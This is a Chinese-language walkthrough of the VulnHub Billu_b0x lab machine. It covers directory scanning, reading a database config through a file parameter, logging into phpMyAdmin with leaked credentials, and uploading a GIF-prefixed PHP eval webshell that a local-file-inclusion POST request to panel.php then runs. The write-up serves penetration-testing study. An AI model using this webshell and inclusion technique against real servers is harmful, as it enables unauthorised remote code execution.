vulhub靶机Billu_b0x

1.下载靶机

https://download.vulnhub.com/billu/Billu\\_b0x.zip

2.信息收集

kali和靶机ip

访问靶机ip

扫描敏感目录

3.漏洞挖掘

一一访问每个文件

发现add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息。test文件下貌似可以进行传参

file传参

get传参不可以,用bp抓包转换为post传参

查看c.php源码

这是数据库连接文件,发现mysql连接用户名密码:

用户名:billu

密码:b0x_billu

数据库名:ica_lab

通过得到的mysql密码登录phpmyadmin成功

ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it。

登录web界面

上传图片,查看图片,存在目录浏览

webshell连接

上传图片马

GIF89a
<?php @eval($_POST['cmd']);?>

然后使用POST传参

http://192.168.126.170/panel.php

load=uploaded_images/2.png&continue=continue

蚁剑连接

相关推荐
tan180°26 分钟前
Boost搜索引擎 网络库与前端(4)
linux·网络·c++·搜索引擎
码农101号40 分钟前
运维安全04 - iptable的介绍以及使用
安全
Mr. Cao code1 小时前
Docker:颠覆传统虚拟化的轻量级革命
linux·运维·ubuntu·docker·容器
抓饼先生2 小时前
Linux control group笔记
linux·笔记·bash
挺6的还2 小时前
25.线程概念和控制(二)
linux
您的通讯录好友2 小时前
conda环境导出
linux·windows·conda
代码AC不AC3 小时前
【Linux】vim工具篇
linux·vim·工具详解
码农hbk4 小时前
Linux signal 图文详解(三)信号处理
linux·信号处理
bug攻城狮4 小时前
Skopeo 工具介绍与 CentOS 7 安装指南
linux·运维·centos
宇宙第一小趴菜4 小时前
08 修改自己的Centos的软件源
linux·运维·centos